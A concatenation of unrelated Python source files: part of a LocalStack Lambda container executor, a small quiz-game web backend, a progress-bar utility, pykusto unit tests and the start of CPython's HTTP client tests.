container_status = cmd_result.strip()
if len(container_status) == 0:
return 0
if container_status.lower().startswith('up '):
return 1
return -1
def get_docker_container_network(self, func_arn):
"""
Determine the network of a docker container.
:param func_arn: The ARN of the lambda function.
:return: name of the container network
"""
with self.docker_container_lock:
status = self.get_docker_container_status(func_arn)
# container does not exist
if status == 0:
return ''
# Get the container name.
container_name = self.get_container_name(func_arn)
docker_cmd = self._docker_cmd()
# Get the container network
LOG.debug('Getting container network: %s' % container_name)
cmd = (
'%s inspect %s'
' --format "{{ .HostConfig.NetworkMode }}"'
) % (docker_cmd, container_name)
LOG.debug(cmd)
cmd_result = run(cmd, asynchronous=False, stderr=subprocess.PIPE, outfile=subprocess.PIPE)
container_network = cmd_result.strip()
return container_network
def idle_container_destroyer(self):
"""
        Iterates through all the lambda containers and destroys any container that has
been inactive for longer than MAX_CONTAINER_IDLE_TIME_MS.
:return: None
"""
LOG.info('Checking if there are idle containers.')
current_time = int(time.time() * 1000)
for func_arn, last_run_time in dict(self.function_invoke_times).items():
duration = current_time - last_run_time
# not enough idle time has passed
if duration < MAX_CONTAINER_IDLE_TIME_MS:
continue
# container has been idle, destroy it.
self.destroy_docker_container(func_arn)
def start_idle_container_destroyer_interval(self):
"""
        Runs idle_container_destroyer() and then re-schedules itself every 60 seconds,
        so that idle containers are checked for and destroyed periodically.
:return: None
"""
self.idle_container_destroyer()
threading.Timer(60.0, self.start_idle_container_destroyer_interval).start()
def get_container_name(self, func_arn):
"""
Given a function ARN, returns a valid docker container name.
:param func_arn: The ARN of the lambda function.
:return: A docker compatible name for the arn.
"""
return 'localstack_lambda_' + re.sub(r'[^a-zA-Z0-9_.-]', '_', func_arn)
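# Example of the ARN sanitization above (the ARN below is made up): every character
# outside [a-zA-Z0-9_.-], here the ':' separators, is replaced with '_':
#   >>> re.sub(r'[^a-zA-Z0-9_.-]', '_', 'arn:aws:lambda:us-east-1:000000000000:function:my-func')
#   'arn_aws_lambda_us-east-1_000000000000_function_my-func'
# giving the container name 'localstack_lambda_arn_aws_lambda_us-east-1_000000000000_function_my-func'.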
class LambdaExecutorSeparateContainers(LambdaExecutorContainers):
def __init__(self):
super(LambdaExecutorSeparateContainers, self).__init__()
self.next_port = 1
self.max_port = LAMBDA_API_UNIQUE_PORTS
self.port_offset = LAMBDA_API_PORT_OFFSET
def prepare_event(self, environment, event_body):
# Tell Lambci to use STDIN for the event
environment['DOCKER_LAMBDA_USE_STDIN'] = '1'
return event_body.encode()
def prepare_execution(self, func_arn, env_vars, runtime, command, handler, lambda_cwd):
entrypoint = ''
if command:
entrypoint = ' --entrypoint ""'
else:
command = '"%s"' % handler
# add Docker Lambda env vars
network = config.LAMBDA_DOCKER_NETWORK
network_str = '--network="%s"' % network if network else ''
if network == 'host':
port = str(self.next_port + self.port_offset)
env_vars['DOCKER_LAMBDA_API_PORT'] = port
env_vars['DOCKER_LAMBDA_RUNTIME_PORT'] = port
self.next_port = (self.next_port + 1) % self.max_port
env_vars_string = ' '.join(['-e {}="${}"'.format(k, k) for (k, v) in env_vars.items()])
debug_docker_java_port = '-p {p}:{p}'.format(p=Util.debug_java_port) if Util.debug_java_port else ''
docker_cmd = self._docker_cmd()
docker_image = Util.docker_image_for_runtime(runtime)
rm_flag = Util.get_docker_remove_flag()
if config.LAMBDA_REMOTE_DOCKER:
cmd = (
'CONTAINER_ID="$(%s create -i'
' %s' # entrypoint
' %s' # debug_docker_java_port
' %s' # env
' %s' # network
' %s' # --rm flag
' %s %s' # image and command
')";'
'%s cp "%s/." "$CONTAINER_ID:/var/task"; '
'%s start -ai "$CONTAINER_ID";'
) % (docker_cmd, entrypoint, debug_docker_java_port, env_vars_string, network_str, rm_flag,
docker_image, command,
docker_cmd, lambda_cwd,
docker_cmd)
else:
lambda_cwd_on_host = Util.get_host_path_for_path_in_docker(lambda_cwd)
cmd = (
'%s run -i'
' %s -v "%s":/var/task'
' %s'
' %s' # network
' %s' # --rm flag
' %s %s'
) % (docker_cmd, entrypoint, lambda_cwd_on_host, env_vars_string,
network_str, rm_flag, docker_image, command)
return cmd
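# For orientation only: with LAMBDA_REMOTE_DOCKER disabled, the command assembled above
# comes out roughly like the following (image tag, paths, env var names and network are
# illustrative values, not actual configuration):
#   docker run -i  -v "/tmp/lambda-abc123":/var/task -e AWS_REGION="$AWS_REGION"
#       --network="bridge" --rm "lambci/lambda:python3.7" "handler.handler"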
class LambdaExecutorLocal(LambdaExecutor):
def _execute(self, func_arn, func_details, event, context=None, version=None):
lambda_cwd = func_details.cwd
environment = func_details.envvars.copy()
# execute the Lambda function in a forked sub-process, sync result via queue
queue = Queue()
lambda_function = func_details.function(version)
def do_execute():
# now we're executing in the child process, safe to change CWD and ENV
if lambda_cwd:
os.chdir(lambda_cwd)
if environment:
os.environ.update(environment)
result = lambda_function(event, context)
queue.put(result)
process = Process(target=do_execute)
with CaptureOutput() as c:
process.run()
result = queue.get()
# Make sure to keep the log line below, to ensure the log stream gets created
log_output = 'START: Lambda %s started via "local" executor ...' % func_arn
# TODO: Interweaving stdout/stderr currently not supported
for stream in (c.stdout(), c.stderr()):
if stream:
log_output += ('\n' if log_output else '') + stream
# store logs to CloudWatch
_store_logs(func_details, log_output)
return result
def execute_java_lambda(self, event, context, main_file, func_details=None):
handler = func_details.handler
opts = config.LAMBDA_JAVA_OPTS if config.LAMBDA_JAVA_OPTS else ''
event_file = EVENT_FILE_PATTERN.replace('*', short_uid())
save_file(event_file, json.dumps(json_safe(event)))
TMP_FILES.append(event_file)
class_name = handler.split('::')[0]
classpath = '%s:%s:%s' % (main_file, Util.get_java_classpath(main_file), LAMBDA_EXECUTOR_JAR)
cmd = 'java %s -cp %s %s %s %s' % (opts, classpath, LAMBDA_EXECUTOR_CLASS, class_name, event_file)
LOG.warning(cmd)
result = self.run_lambda_executor(cmd, func_details=func_details)
return result
class Util:
debug_java_port = False
@classmethod
def get_java_opts(cls):
opts = config.LAMBDA_JAVA_OPTS or ''
# Replace _debug_port_ with a random free port
if '_debug_port_' in opts:
if not cls.debug_java_port:
cls.debug_java_port = get_free_tcp_port()
opts = opts.replace('_debug_port_', ('%s' % cls.debug_java_port))
else:
# Parse the debug port from opts
m = re.match('.*address=(\\d+).*', opts)
if m is not None:
cls.debug_java_port = m.groups()[0]
return opts
@classmethod
def get_host_path_for_path_in_docker(cls, path):
return re.sub(r'^%s/(.*)$' % config.TMP_FOLDER,
r'%s/\1' % config.HOST_TMP_FOLDER, path)
@classmethod
def format_windows_path(cls, path):
temp = path.replace(':', '').replace('\\', '/')
if len(temp) >= 1 and temp[:1] != '/':
temp = '/' + temp
temp = '%s%s' % (config.WINDOWS_DOCKER_MOUNT_PREFIX, temp)
return temp
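    # Example (illustrative values): assuming WINDOWS_DOCKER_MOUNT_PREFIX is '/host_mnt',
    # format_windows_path('C:\\Users\\me\\tmp') returns '/host_mnt/C/Users/me/tmp'.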
@classmethod
def docker_image_for_runtime(cls, runtime):
docker_tag = runtime
docker_image = config.LAMBDA_CONTAINER_REGISTRY
# TODO: remove prefix once execution issues are fixed with dotnetcore/python lambdas
# See https://github.com/lambci/docker-lambda/pull/218
lambdas_to_add_prefix = ['dotnetcore2.0', 'dotnetcore2.1', 'python2.7', 'python3.6', 'python3.7']
if docker_image == 'lambci/lambda' and any(img in docker_tag for img in lambdas_to_add_prefix):
docker_tag = '20191117-%s' % docker_tag
return '"%s:%s"' % (docker_image, docker_tag)
@classmethod
def get_docker_remove_flag(cls):
return '--rm' if config.LAMBDA_REMOVE_CONTAINERS else ''
@classmethod
def get_java_classpath(cls, archive):
"""
Return the Java classpath, using the parent folder of the
given archive as the base folder.
The result contains any *.jar files in the base folder, as
well as any JAR files in the "lib/*" subfolder living
alongside the supplied java archive (.jar or .zip).
:param archive: an absolute path to a .jar or .zip Java archive
:return: the Java classpath, relative to the base dir of "archive"
"""
entries = ['.']
base_dir = os.path.dirname(archive)
for pattern in ['%s/*.jar', '%s/lib/*.jar', '%s/java/lib/*.jar', '%s/*.zip']:
for entry in glob.glob(pattern % base_dir):
if os.path.realpath(archive) != os.path.realpath(entry):
entries.append(os.path.relpath(entry, base_dir))
# make sure to append the localstack-utils.jar at the end of the classpath
# https://github.com/localstack/localstack/issues/1160
entries.append(os.path.relpath(archive, base_dir))
entries.append('*.jar')
entries.append('java/lib/*.jar')
result = ':'.join(entries)
return result
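# Worked example for get_java_classpath() (hypothetical layout): for the archive
# '/opt/code/my-lambda.jar' with a single dependency '/opt/code/lib/dep.jar', the method
# returns something like '.:lib/dep.jar:my-lambda.jar:*.jar:java/lib/*.jar', i.e. all
# entries relative to '/opt/code', with the archive itself appended after its dependencies.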
# --------------
# GLOBAL STATE
# --------------
EXECUTOR_LOCAL = LambdaExecutorLocal()
EXECUTOR_CONTAINERS_SEPARATE = LambdaExecutorSeparateContainers()
EXECUTOR_CONTAINERS_REUSE = LambdaExecutorReuseContainers()
DEFAULT_EXECUTOR = EXECUTOR_CONTAINERS_SEPARATE
# the keys of AVAILABLE_EXECUTORS map to the LAMBDA_EXECUTOR config variable
AVAILABLE_EXECUTORS = {
'local': EXECUTOR_LOCAL,
'docker': EXECUTOR_CONTAINERS_SEPARATE,
'docker-reuse': EXECUTOR_CONTAINERS_REUSE
}
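# Minimal selection sketch (not part of this module's public surface): the executor
# configured via the LAMBDA_EXECUTOR variable is typically looked up like
#   lambda_executor = AVAILABLE_EXECUTORS.get(config.LAMBDA_EXECUTOR, DEFAULT_EXECUTOR)
# falling back to DEFAULT_EXECUTOR for unknown values.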
|
backend.py
|
#!/usr/bin/python3
import json, hug, random, time, threading, operator
with open("questions.json") as f:
questions = json.load(f)
sessions = {}
questionIDs = list(questions.keys())
# Example session structure:
# sessions["test"] = {"questionCount": 0, "questionsRemaining": 0, "players": {"Mork": {"timeOut": 0, "score": 2, "latestScore": 0}, "Mindy": {"timeOut": 0, "score": 0, "latestScore": 0}}, "questions": [], "activeQuestionID": "000"}
def score(sessionName, clientName, answer):
if sessions[sessionName]["players"][clientName]["latestScore"] == 0:
if answer == questions[sessions[sessionName]["activeQuestionID"]]["solution"]:
sessions[sessionName]["players"][clientName]["latestScore"] = len([player for player in sessions[sessionName]["players"] if sessions[sessionName]["players"][player]["latestScore"] == 0])
return 0
else:
sessions[sessionName]["players"][clientName]["latestScore"] = -1
return 2
else:
return 1
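# Worked example of the scoring rule above (hypothetical 3-player session): all players
# start a question with latestScore == 0. The first correct answer is scored while all 3
# players still have latestScore == 0, so it earns 3 points; the next correct answer earns
# 2, and a wrong answer is marked -1. score() returns 0 for a scored answer, 2 for a wrong
# one, and 1 if the player has already answered the active question.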
def heartbeatIncrementor():
    while not heartbeatFinal:
        # iterate over snapshots, so concurrent API calls that add sessions or
        # players cannot invalidate the iteration
        for session in list(sessions):
            cleanupList = []
            for player in list(sessions[session]["players"]):
sessions[session]["players"][player]["timeOut"] += 1
if sessions[session]["players"][player]["timeOut"] > 8:
cleanupList.append(player)
for player in cleanupList:
del sessions[session]["players"][player]
time.sleep(5)
heartbeatFinal = False
t = threading.Thread(target=heartbeatIncrementor)
t.start()
# t.cancel()
# API endpoints
@hug.get("/backend/client/new", output=hug.output_format.json)
def clientInit(sessionName, clientName):
if sessionName in sessions:
if clientName in sessions[sessionName]["players"]:
return {"status": 2}
else:
sessions[sessionName]["players"][clientName] = {"timeOut": 0, "score": 0, "latestScore": 0}
return {"status": 0}
else:
return {"status":1}
@hug.get("/backend/client/heartbeat", output=hug.output_format.json)
def heartbeatHelper(sessionName, clientName):
if sessionName in sessions:
if clientName in sessions[sessionName]["players"]:
sessions[sessionName]["players"][clientName]["timeOut"] = 0
return {"status": 0}
else:
return {"status": 2}
else:
return {"status":1}
@hug.get("/backend/question/new", output=hug.output_format.json)
def returnQuestion(sessionName):
if sessionName in sessions:
if sessions[sessionName]["questionsRemaining"] != 0:
sessions[sessionName]["questionsRemaining"] -= 1
sessions[sessionName]["activeQuestionID"] = questionIDs[-1]
currentQuestion = sessions[sessionName]["questionCount"] - sessions[sessionName]["questionsRemaining"]
return {"status": 0, "questionCount":sessions[sessionName]["questionCount"], "currentQuestion": currentQuestion, "question":questions[questionIDs.pop()]}
else:
return {"status": 2}
else:
return {"status":1}
@hug.get("/backend/question/results", output=hug.output_format.json)
def closeQuestion(sessionName):
if sessionName in sessions:
sessions[sessionName]["activeQuestionID"] = "000"
results = []
for player in sessions[sessionName]["players"]:
results.append({"player": player, "result": sessions[sessionName]["players"][player]["latestScore"]})
sessions[sessionName]["players"][player]["score"] += sessions[sessionName]["players"][player]["latestScore"]
sessions[sessionName]["players"][player]["latestScore"] = 0
results.sort(key=operator.itemgetter("result"))
while len(results) < 3:
results.insert(0, {"player": "", "result": -1})
return {"status": 0, "results": results[::-1]}
else:
return {"status": 1}
@hug.get("/backend/client/answer", output=hug.output_format.json)
def answerQuestion(sessionName, clientName, answer:hug.types.number):
if sessionName in sessions:
if clientName in sessions[sessionName]["players"]:
s = score(sessionName, clientName, answer)
if s == 0:
return {"status": 0}
elif s == 2:
return {"status": 4}
else:
return {"status": 3}
else:
return {"status": 2}
else:
return {"status": 1}
@hug.get("/backend/session/new", output=hug.output_format.json)
def sessionInit(sessionName,noquestions:hug.types.number):
if sessionName in sessions:
return {"status": 1}
questionPool = list(questionIDs)
questionList = []
for i in range(noquestions):
if len(questionPool) == 0:
return {"status": 2}
random.shuffle(questionPool)
questionList.append(questionPool.pop())
sessions[sessionName] = {"questionCount": noquestions, "questionsRemaining": noquestions, "players":{}, "questions": questionList, "activeQuestionID": "000"}
return {"status": 0}
@hug.get("/backend/session/playerlist", output=hug.output_format.json)
def playerList(sessionName):
if sessionName in sessions:
        return list(sessions[sessionName]["players"].keys())
return {"status":1}
@hug.get("/backend/session/standings", output=hug.output_format.json)
def scoreboard(sessionName):
if sessionName in sessions:
standings = []
for player in sessions[sessionName]["players"]:
standings.append({"player": player, "score": sessions[sessionName]["players"][player]["score"]})
standings.sort(key=operator.itemgetter("score"))
while len(standings) < 5:
            standings.insert(0, {"player": "", "score": -1})
return {"status": 0, "results": standings}
else:
return {"status": 1}
# Static file returns
@hug.get("/10ft/index", output=hug.output_format.html)
@hug.get("/10ft/index.html", output=hug.output_format.html)
@hug.get("/10ft", output=hug.output_format.html)
def staticReturn10ftIndex():
with open("../10ft/index.html") as f:
return f.read()
@hug.get("/10ft/qw.js", output=hug.output_format.text)
def staticReturn10ftJava():
with open("../10ft/qw.js") as f:
return f.read()
@hug.get("/10ft/joining.html", output=hug.output_format.html)
@hug.get("/10ft/joining", output=hug.output_format.html)
def dynamicReturn10ftJoining(sessionName):
with open("../10ft/joining.html") as f:
return f.read().replace("$SESSIONNAME$", sessionName)
@hug.get("/10ft/question.html", output=hug.output_format.html)
@hug.get("/10ft/question", output=hug.output_format.html)
def dynamicReturn10ftQuestion(sessionName):
with open("../10ft/question.html") as f:
return f.read().replace("$SESSIONNAME$", sessionName)
@hug.get("/index", output=hug.output_format.html)
@hug.get("/index.html", output=hug.output_format.html)
@hug.get("/", output=hug.output_format.html)
def staticReturnClientIndex():
with open("../client/index.html") as f:
return f.read()
@hug.get("/qw.js", output=hug.output_format.text)
def staticReturnClientJava():
with open("../client/qw.js") as f:
return f.read()
@hug.get("/play.html", output=hug.output_format.html)
@hug.get("/play", output=hug.output_format.html)
def dynamicReturnClientPlay(sessionName, clientName):
with open("../client/play.html") as f:
return f.read().replace("$SESSIONNAME$", sessionName).replace("$CLIENTNAME$", clientName)
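# This module is intended to be served with the hug CLI, for example (port is illustrative):
#   hug -f backend.py -p 8000
# which exposes the @hug.get endpoints above and serves the static/templated HTML files.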
|
progress.py
|
from __future__ import division, absolute_import
import sys
import threading
import time
from timeit import default_timer
def format_time(t):
"""Format seconds into a human readable form.
>>> format_time(10.4)
'10.4s'
>>> format_time(1000.4)
'16min 40.4s'
"""
m, s = divmod(t, 60)
h, m = divmod(m, 60)
if h:
return '{0:2.0f}hr {1:2.0f}min {2:4.1f}s'.format(h, m, s)
elif m:
return '{0:2.0f}min {1:4.1f}s'.format(m, s)
else:
return '{0:4.1f}s'.format(s)
class progressbar(object):
"""A simple progressbar for iterables.
Displays a progress bar showing progress through an iterable.
Parameters
----------
iterable : iterable
The object to iterate over.
width : int, optional
Width of the bar in characters.
enabled : bool, optional
Whether to log progress. Useful for turning off progress reports
without changing your code. Default is True.
file : file, optional
Where to log progress. Default is ``sys.stdout``.
Example
-------
>>> with progressbar(iterable) as itbl: # doctest: +SKIP
... for i in itbl:
... do_stuff(i)
    [########################################] | 100% Completed |  5.2s
"""
def __init__(self, iterable, width=40, enabled=True, file=None):
self._iterable = iterable
self._ndone = 0
self._ntotal = len(iterable)
self._width = width
self._enabled = enabled
self._file = sys.stdout if file is None else file
def __enter__(self):
if self._enabled:
self._start_time = default_timer()
# Start background thread
self._running = True
self._timer = threading.Thread(target=self._timer_func)
self._timer.daemon = True
self._timer.start()
return self
def __exit__(self, type, value, traceback):
if self._enabled:
self._running = False
self._timer.join()
self._update_bar()
self._file.write('\n')
self._file.flush()
def __iter__(self):
for i in self._iterable:
self._ndone += 1
yield i
def _timer_func(self):
while self._running:
self._update_bar()
time.sleep(0.1)
def _update_bar(self):
elapsed = default_timer() - self._start_time
frac = (self._ndone / self._ntotal) if self._ntotal else 1
bar = '#' * int(self._width * frac)
percent = int(100 * frac)
elapsed = format_time(elapsed)
msg = '\r[{0:<{1}}] | {2}% Completed | {3}'.format(bar, self._width,
percent, elapsed)
try:
self._file.write(msg)
self._file.flush()
except ValueError:
pass
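if __name__ == '__main__':
    # Tiny self-contained demo (not part of the library surface): wraps a trivial
    # loop so the bar can be seen rendering on stdout.
    with progressbar(range(100)) as items:
        for _ in items:
            time.sleep(0.02)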
|
test_client_fetch.py
|
from threading import Thread, Lock
from typing import Any, Callable, List
from unittest.mock import patch
from pykusto import PyKustoClient, Query
# noinspection PyProtectedMember
from pykusto._src.client_base import Database
# noinspection PyProtectedMember
from pykusto._src.expressions import _StringColumn, _NumberColumn, _AnyTypeColumn, _BooleanColumn
# noinspection PyProtectedMember
from pykusto._src.type_utils import _KustoType
from test.test_base import TestBase, MockKustoClient, RecordedQuery, mock_tables_response, mock_getschema_response, mock_databases_response
background_query_lock = Lock()
class TestClientFetch(TestBase):
query_thread: Thread = None
query_results: List = []
@staticmethod
def query_in_background(query: Callable[[], Any]):
with background_query_lock:
assert TestClientFetch.query_thread is None
TestClientFetch.query_results.clear()
TestClientFetch.query_thread = Thread(target=lambda: TestClientFetch.query_results.extend(query()))
TestClientFetch.query_thread.start()
@staticmethod
def get_background_query_result():
with background_query_lock:
assert TestClientFetch.query_thread is not None
TestClientFetch.query_thread.join()
TestClientFetch.query_thread = None
return tuple(TestClientFetch.query_results)
def test_column_fetch(self):
mock_client = MockKustoClient(record_metadata=True)
table = PyKustoClient(mock_client, fetch_by_default=False)['test_db']['mock_table']
table.blocking_refresh()
# Fetch query
self.assertEqual(
[RecordedQuery('test_db', '.show table mock_table | project AttributeName, AttributeType | limit 10000')],
mock_client.recorded_queries,
)
# Dot notation
self.assertType(table.foo, _StringColumn)
self.assertType(table.bar, _NumberColumn)
# Bracket notation
self.assertType(table['foo'], _StringColumn)
self.assertType(table['bar'], _NumberColumn)
self.assertType(table['baz'], _AnyTypeColumn)
def test_block_until_fetch_is_done(self):
mock_client = MockKustoClient(block=True, record_metadata=True)
client = PyKustoClient(mock_client)
self.query_in_background(client.get_databases_names)
mock_client.release()
client.wait_for_items()
# Make sure the fetch query was indeed called
assert not mock_client.blocked()
self.assertEqual(self.get_background_query_result(), ('test_db', ))
def test_dir_before_fetch_is_done(self):
mock_client = MockKustoClient(block=True, record_metadata=True)
client = PyKustoClient(mock_client)
self.query_in_background(lambda: dir(client))
# Return the fetch
mock_client.release()
client.wait_for_items()
# Make sure the fetch query was indeed called
assert not mock_client.blocked()
self.assertIn('test_db', self.get_background_query_result())
def test_column_fetch_slow(self):
mock_client = MockKustoClient(block=True)
table = PyKustoClient(mock_client, fetch_by_default=False)['test_db']['mock_table']
table.refresh()
mock_client.wait_until_blocked()
self.assertType(table['foo'], _AnyTypeColumn)
self.assertType(table['bar'], _AnyTypeColumn)
self.assertType(table['baz'], _AnyTypeColumn)
# Return the fetch
mock_client.release()
table.wait_for_items()
# Make sure the fetch query was indeed called
assert not mock_client.blocked()
@patch("pykusto._src.item_fetcher._DEFAULT_GET_ITEM_TIMEOUT_SECONDS", 0.0001)
def test_table_fetch_slower_than_timeout(self):
mock_client = MockKustoClient(block=True)
try:
PyKustoClient(mock_client)['test_db']['mock_table']
finally:
            # Return the fetch
mock_client.release()
def test_query_before_fetch_returned(self):
mock_client = MockKustoClient(block=True, record_metadata=True)
table = PyKustoClient(mock_client, fetch_by_default=False)['test_db']['mock_table']
table.refresh()
mock_client.wait_until_blocked()
mock_client.do_not_block_next_requests()
self.query_in_background(Query(table).take(5).execute)
# Return the fetch
mock_client.release()
table.wait_for_items()
self.get_background_query_result()
# Make sure the fetch query was indeed called
assert not mock_client.blocked()
        # Before the fix, the order of the returned queries was reversed
self.assertEqual(
[
RecordedQuery('test_db', '.show table mock_table | project AttributeName, AttributeType | limit 10000'),
RecordedQuery('test_db', 'mock_table | take 5'),
],
mock_client.recorded_queries,
)
def test_table_fetch(self):
mock_client = MockKustoClient(record_metadata=True)
db = PyKustoClient(mock_client, fetch_by_default=False)['test_db']
db.blocking_refresh()
self.assertEqual(
[RecordedQuery('test_db', '.show database schema | project TableName, ColumnName, ColumnType | limit 10000')],
mock_client.recorded_queries,
)
table = db.mock_table
# Table columns
self.assertType(table.foo, _StringColumn)
self.assertType(table.bar, _NumberColumn)
self.assertType(table['baz'], _AnyTypeColumn)
# Bracket notation
self.assertType(db['other_table']['foo'], _AnyTypeColumn)
# Dot notation error
self.assertRaises(
AttributeError("PyKustoClient('test_cluster.kusto.windows.net').Database('test_db') has no attribute 'test_table_1'"),
lambda: db.test_table_1
)
def test_two_tables_fetch(self):
mock_client = MockKustoClient(record_metadata=True)
db = PyKustoClient(mock_client, fetch_by_default=False)['test_db']
db.blocking_refresh()
self.assertEqual(
[RecordedQuery('test_db', '.show database schema | project TableName, ColumnName, ColumnType | limit 10000')],
mock_client.recorded_queries,
)
# Table columns
self.assertType(db.mock_table.foo, _StringColumn)
self.assertType(db.mock_table.bar, _NumberColumn)
self.assertType(db.mock_table_2['baz'], _BooleanColumn)
self.assertType(db['other_table']['foo'], _AnyTypeColumn)
# Union
table = db.get_table('mock_table', 'mock_table_2')
self.assertType(table.foo, _StringColumn)
self.assertType(table.bar, _NumberColumn)
self.assertType(table.baz, _BooleanColumn)
# Wildcard
table = db.get_table('mock_*')
self.assertType(table.foo, _StringColumn)
self.assertType(table.bar, _NumberColumn)
self.assertType(table.baz, _BooleanColumn)
def test_union_column_name_conflict(self):
mock_client = MockKustoClient(
tables_response=mock_tables_response([
('test_table_1', [('foo', _KustoType.STRING), ('bar', _KustoType.INT)]),
('test_table_2', [('foo', _KustoType.BOOL)])
]),
getschema_response=mock_getschema_response([
('foo_string', _KustoType.STRING), ('bar', _KustoType.INT), ('foo_bool', _KustoType.BOOL)
]),
record_metadata=True,
)
db = PyKustoClient(mock_client, fetch_by_default=False)['test_db']
db.blocking_refresh()
table = db.get_table('test_table_*')
table.blocking_refresh() # To trigger name conflict resolution
self.assertEqual(
[
# First trying the usual fetch
RecordedQuery('test_db', '.show database schema | project TableName, ColumnName, ColumnType | limit 10000'),
# Fallback for name conflict resolution
RecordedQuery('test_db', 'union test_table_* | getschema | project ColumnName, DataType | limit 10000')
],
mock_client.recorded_queries,
)
self.assertType(table.foo_string, _StringColumn)
self.assertType(table.bar, _NumberColumn)
self.assertType(table.foo_bool, _BooleanColumn)
def test_union_wildcard_one_table(self):
mock_client = MockKustoClient(record_metadata=True)
db = PyKustoClient(mock_client, fetch_by_default=False)['test_db']
db.blocking_refresh()
self.assertEqual(
[RecordedQuery('test_db', '.show database schema | project TableName, ColumnName, ColumnType | limit 10000')],
mock_client.recorded_queries,
)
table = db.get_table('mock_table_*')
self.assertType(table.foo, _AnyTypeColumn)
self.assertType(table.bar, _AnyTypeColumn)
self.assertType(table['baz'], _BooleanColumn)
def test_database_fetch(self):
mock_client = MockKustoClient(record_metadata=True)
client = PyKustoClient(mock_client)
client.wait_for_items()
self.assertEqual(
[RecordedQuery('', '.show databases schema | project DatabaseName, TableName, ColumnName, ColumnType | limit 100000')],
mock_client.recorded_queries,
)
# Table columns
table = client.test_db.mock_table
self.assertType(table.foo, _StringColumn)
self.assertType(table.bar, _NumberColumn)
self.assertType(table['baz'], _AnyTypeColumn)
self.assertType(client.test_db['other_table']['foo'], _AnyTypeColumn)
# Various utility methods
db = client.get_database('test_db')
self.assertType(db, Database)
self.assertEqual('test_db', db.get_name())
self.assertEqual(('test_db',), tuple(client.get_databases_names()))
self.assertEqual(('mock_table', 'other_table'), tuple(client.test_db.get_table_names()))
self.assertEqual(('foo', 'bar', 'baz'), tuple(client.test_db.mock_table.get_columns_names()))
self.assertTrue({'foo', 'bar'} < set(dir(client.test_db.mock_table)))
self.assertEqual("PyKustoClient('test_cluster.kusto.windows.net').Database('test_db').Table('mock_table')", repr(client.test_db.mock_table))
def test_autocomplete_with_dot(self):
mock_client = MockKustoClient(
databases_response=mock_databases_response([('test_db', [('mock_table', [('foo', _KustoType.STRING), ('bar.baz', _KustoType.INT)])])]),
)
client = PyKustoClient(mock_client)
client.wait_for_items()
# Table columns
table = client.test_db.mock_table
self.assertType(table.foo, _StringColumn)
self.assertType(table.bar, _AnyTypeColumn)
self.assertType(table['bar.baz'], _NumberColumn)
autocomplete_list = set(dir(client.test_db.mock_table))
self.assertIn('foo', autocomplete_list)
self.assertNotIn('bar.baz', autocomplete_list)
def test_exception_from_autocomplete(self):
mock_client = MockKustoClient(databases_response=self.raise_mock_exception)
client = PyKustoClient(mock_client, fetch_by_default=True)
autocomplete_list = set(dir(client))
self.assertNotIn('test_db', autocomplete_list)
def test_empty_database(self):
mock_client = MockKustoClient(
databases_response=mock_databases_response([
('test_db', [('mock_table', [('foo', _KustoType.STRING), ('bar', _KustoType.INT)])]),
('', [('test_table1', [('foo1', _KustoType.STRING), ('bar1', _KustoType.INT)])])
]),
record_metadata=True,
)
client = PyKustoClient(mock_client)
client.wait_for_items()
self.assertEqual(
[RecordedQuery('', '.show databases schema | project DatabaseName, TableName, ColumnName, ColumnType | limit 100000')],
mock_client.recorded_queries,
)
self.assertType(client.test_db.mock_table.foo, _StringColumn)
def test_client_database_names_not_fetched(self):
client = PyKustoClient(MockKustoClient(), fetch_by_default=False)
self.assertEqual(frozenset(['test_db']), set(client.get_databases_names()))
def test_client_databases_not_fetched(self):
client = PyKustoClient(MockKustoClient(), fetch_by_default=False)
self.assertEqual(frozenset(['test_db']), set(db.get_name() for db in client.get_databases()))
def test_exception_while_fetching(self):
client = PyKustoClient(MockKustoClient(databases_response=self.raise_mock_exception))
self.assertRaises(
Exception("Mock exception"),
lambda: set(client.get_databases_names()),
)
|
test_httplib.py
|
import errno
from http import client
import io
import itertools
import os
import array
import re
import socket
import threading
import unittest
TestCase = unittest.TestCase
from test import support
here = os.path.dirname(__file__)
# Self-signed cert file for 'localhost'
CERT_localhost = os.path.join(here, 'keycert.pem')
# Self-signed cert file for 'fakehostname'
CERT_fakehostname = os.path.join(here, 'keycert2.pem')
# Self-signed cert file for self-signed.pythontest.net
CERT_selfsigned_pythontestdotnet = os.path.join(here, 'selfsigned_pythontestdotnet.pem')
# constants for testing chunked encoding
chunked_start = (
'HTTP/1.1 200 OK\r\n'
'Transfer-Encoding: chunked\r\n\r\n'
'a\r\n'
'hello worl\r\n'
'3\r\n'
'd! \r\n'
'8\r\n'
'and now \r\n'
'22\r\n'
'for something completely different\r\n'
)
chunked_expected = b'hello world! and now for something completely different'
chunk_extension = ";foo=bar"
last_chunk = "0\r\n"
last_chunk_extended = "0" + chunk_extension + "\r\n"
trailers = "X-Dummy: foo\r\nX-Dumm2: bar\r\n"
chunked_end = "\r\n"
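# For reference: the chunk sizes in chunked_start are hexadecimal ('a' == 10, '22' == 34),
# and the concatenated chunk payloads ('hello worl' + 'd! ' + 'and now ' +
# 'for something completely different') decode to chunked_expected.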
HOST = support.HOST
class FakeSocket:
def __init__(self, text, fileclass=io.BytesIO, host=None, port=None):
if isinstance(text, str):
text = text.encode("ascii")
self.text = text
self.fileclass = fileclass
self.data = b''
self.sendall_calls = 0
self.file_closed = False
self.host = host
self.port = port
def sendall(self, data):
self.sendall_calls += 1
self.data += data
def makefile(self, mode, bufsize=None):
if mode != 'r' and mode != 'rb':
raise client.UnimplementedFileMode()
# keep the file around so we can check how much was read from it
self.file = self.fileclass(self.text)
self.file.close = self.file_close #nerf close ()
return self.file
def file_close(self):
self.file_closed = True
def close(self):
pass
def setsockopt(self, level, optname, value):
pass
class EPipeSocket(FakeSocket):
def __init__(self, text, pipe_trigger):
# When sendall() is called with pipe_trigger, raise EPIPE.
FakeSocket.__init__(self, text)
self.pipe_trigger = pipe_trigger
def sendall(self, data):
if self.pipe_trigger in data:
raise OSError(errno.EPIPE, "gotcha")
self.data += data
def close(self):
pass
class NoEOFBytesIO(io.BytesIO):
"""Like BytesIO, but raises AssertionError on EOF.
This is used below to test that http.client doesn't try to read
more from the underlying file than it should.
"""
def read(self, n=-1):
data = io.BytesIO.read(self, n)
if data == b'':
raise AssertionError('caller tried to read past EOF')
return data
def readline(self, length=None):
data = io.BytesIO.readline(self, length)
if data == b'':
raise AssertionError('caller tried to read past EOF')
return data
class FakeSocketHTTPConnection(client.HTTPConnection):
"""HTTPConnection subclass using FakeSocket; counts connect() calls"""
def __init__(self, *args):
self.connections = 0
super().__init__('example.com')
self.fake_socket_args = args
self._create_connection = self.create_connection
